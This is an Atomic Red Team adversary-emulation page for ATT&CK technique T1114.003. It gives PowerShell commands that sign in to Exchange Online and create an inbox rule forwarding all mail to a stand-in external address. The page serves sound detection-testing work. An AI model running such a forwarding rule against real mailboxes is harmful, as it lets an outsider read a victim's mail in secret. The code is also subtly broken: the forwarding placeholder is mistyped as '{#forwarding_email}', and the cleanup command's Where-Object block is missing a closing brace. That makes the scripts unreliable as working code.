# T1114.003 - Email Collection: Email Forwarding Rule
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1114/003)
<blockquote>Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email-forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.(Citation: US-CERT TA18-068A 2018) Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.(Citation: Pfammatter - Hidden Inbox Rules) Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2)(Citation: Mac Forwarding Rules)

Any user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.(Citation: Pfammatter - Hidden Inbox Rules)</blockquote>

## Atomic Tests

- [Atomic Test #1 - Office365 - Email Forwarding](#atomic-test-1---office365---email-forwarding)


<br/>

## Atomic Test #1 - Office365 - Email Forwarding
Creates a new Inbox Rule to forward emails to an external user via the "ForwardTo" property of the New-InboxRule Powershell cmdlet.

**Supported Platforms:** Office-365


**auto_generated_guid:** 3234117e-151d-4254-9150-3d0bac41e38c





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | office-365 username | string | |
| password | office-365 password | string | |
| rule_name | email rule name | string | Atomic Red Team Email Rule|
| forwarding_email | destination email addresses | string | Atomic_Operator@fakeemail.aq|


#### Attack Commands: Run with `powershell`! 


```powershell
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
```

#### Cleanup Commands:
```powershell
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
Get-InboxRule | Where-Object { $_.Name -eq "#{rule_name}" | ForEach-Object { Remove-InboxRule -Identity $_.Identity -Force -Confirm:$False }
```



#### Dependencies:  Run with `powershell`!
##### Description: ExchangeOnlineManagement PowerShell module must be installed. Your user must also have an Exchange license.
##### Check Prereq Commands:
```powershell
$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
if (-not $RequiredModule) {exit 1}
if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
```
##### Get Prereq Commands:
```powershell
Install-Module -Name ExchangeOnlineManagement         
Import-Module ExchangeOnlineManagement
```




<br/>
